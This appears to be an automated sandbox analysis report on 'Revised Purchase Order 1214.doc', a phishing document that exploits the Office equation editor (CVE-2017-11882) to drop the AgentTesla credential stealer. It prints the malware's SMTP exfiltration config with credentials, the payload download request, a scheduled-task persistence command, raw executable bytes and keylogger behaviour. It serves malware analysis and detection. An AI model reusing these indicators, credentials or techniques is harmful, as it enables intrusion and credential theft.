Loading ...

Play interactive tourEdit tour

Analysis Report Revised Purchase Order 1214.doc

Overview

General Information

Sample Name:Revised Purchase Order 1214.doc
Analysis ID:349841
MD5:4b6b36751c6b94190a4ffd8cf8859758
SHA1:b1771187bcd8c9dc333b90131acd3a71e315c111
SHA256:ea6269300a84f6764e771f3c560da1a639272149302d51a1e31bbee034691944
Tags:doc

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Injects a PE file into a foreign processes
Installs a global keyboard hook
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1492 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2512 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • pridingnsjhfhdjs.exe (PID: 260 cmdline: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe MD5: CEDD3570A65CE74199167DA6E5190CC4)
      • schtasks.exe (PID: 2916 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • pridingnsjhfhdjs.exe (PID: 912 cmdline: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe MD5: CEDD3570A65CE74199167DA6E5190CC4)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "gIf7Ulq0jmX9J", "URL: ": "https://l76BkUNIC14JIoEXp.org", "To: ": "mrst@mrst-kr.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "3PAeGPRhRXRtk", "From: ": "mrst@mrst-kr.icu"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.2394346599.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.pridingnsjhfhdjs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.pridingnsjhfhdjs.exe.372b0d0.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                4.2.pridingnsjhfhdjs.exe.3688e80.6.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.pridingnsjhfhdjs.exe.372b0d0.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    4.2.pridingnsjhfhdjs.exe.2481d30.3.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                      Click to see the 1 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, CommandLine: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, NewProcessName: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, OriginalFileName: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2512, ProcessCommandLine: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, ProcessId: 260
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 43.252.37.193, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2512, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2512, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TrC86HH4pxVZ49N[1].exe
                      Sigma detected: Scheduled temp file as task from temp locationShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, ParentImage: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, ParentProcessId: 260, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp', ProcessId: 2916

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: pridingnsjhfhdjs.exe.912.7.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "gIf7Ulq0jmX9J", "URL: ": "https://l76BkUNIC14JIoEXp.org", "To: ": "mrst@mrst-kr.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "3PAeGPRhRXRtk", "From: ": "mrst@mrst-kr.icu"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: globalteamacademy.comVirustotal: Detection: 7%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Revised Purchase Order 1214.docVirustotal: Detection: 45%Perma Link
                      Source: Revised Purchase Order 1214.docReversingLabs: Detection: 42%

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeJump to behavior
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4x nop then jmp 0033DD24h4_2_0033D875
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4x nop then jmp 0033DD24h4_2_0033D2FF
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4x nop then jmp 0033DD24h4_2_0033D3BD
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4x nop then jmp 00331781h4_2_00330EA8
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_0033E010
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_0033E001
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4x nop then jmp 0033DD24h4_2_0033D858
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_0033DF50
                      Source: global trafficDNS query: name: globalteamacademy.com
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 43.252.37.193:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 43.252.37.193:80

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: https://l76BkUNIC14JIoEXp.org
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Feb 2021 09:28:20 GMTServer: ApacheLast-Modified: Mon, 08 Feb 2021 03:31:11 GMTAccept-Ranges: bytesContent-Length: 734720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a af 20 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 20 0b 00 00 14 00 00 00 00 00 00 3e 3e 0b 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 3d 0b 00 57 00 00 00 00 40 0b 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1e 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 12 00 00 00 40 0b 00 00 12 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3e 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 88 24 0a 00 5c 19 01 00 03 00 00 00 01 00 00 06 28 e1 00 00 60 43 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 07 00 00 0a 00 02 16 28 08 00 00 0a 00 02 17 28 09 00 00 0a 00 02 17 28 0a 00 00 0a 00 02 16 28 0b 00 00 0a 00 2a 00 4e 00 02 28 09 00 00 06 6f 16 00 00 06 28 0d 00 00 0a 00 2a 26 00 02 28 0f 00 00 0a 00 2a 00 00 ce 73 10 00 00 0a 80 01 00 00 04 73 11 00 00 0a 80 02 00 00 04 73 12 00 00 0a 80 03 00 00 04 73 13 00 00 0a 80 04 00 00 04 73 14 00 00 0a 80 05 00 00 04 2a 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 15 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 16 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 17 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 18 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f
                      Source: Joe Sandbox ViewIP Address: 43.252.37.193 43.252.37.193
                      Source: Joe Sandbox ViewIP Address: 198.54.122.60 198.54.122.60
                      Source: Joe Sandbox ViewASN Name: NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
                      Source: global trafficHTTP traffic detected: GET /showcase/pal/TrC86HH4pxVZ49N.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADBC433-349E-46EF-BF24-C3A751787722}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /showcase/pal/TrC86HH4pxVZ49N.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: globalteamacademy.com
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmpString found in binary or memory: http://Gspsks.com
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chamber
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpString found in binary or memory: http://crl.chamb
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394540073.000000000052E000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrusm
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: pridingnsjhfhdjs.exe, 00000007.00000003.2229427814.00000000062C1000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/tru
                      Source: pridingnsjhfhdjs.exe, 00000007.00000003.2230027744.00000000062C1000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394491408.00000000004BD000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab&
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394540073.000000000052E000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enMD
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmpString found in binary or memory: http://mail.privateemail.com
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2144136289.00000000054C0000.00000002.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2397057419.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139955625.0000000002471000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401524278.00000000081A0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2144136289.00000000054C0000.00000002.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2397057419.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secclu
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395544737.00000000027B7000.00000004.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2395494768.0000000002749000.00000004.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmpString found in binary or memory: https://l76BkUNIC14JIoEXp.org
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: pridingnsjhfhdjs.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Contains functionality to register a low level keyboard hookShow sources
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_00A47150 SetWindowsHookExW 0000000D,00000000,?,?7_2_00A47150
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 7.2.pridingnsjhfhdjs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE6ADD9C3u002d899Au002d4BECu002dBDE6u002d6DA676D3EF08u007d/u0037A14B8E8u002dCE6Cu002d4FA1u002dB56Cu002dC13370123E47.csLarge array initialization: .cctor: array initializer size 11931
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TrC86HH4pxVZ49N[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
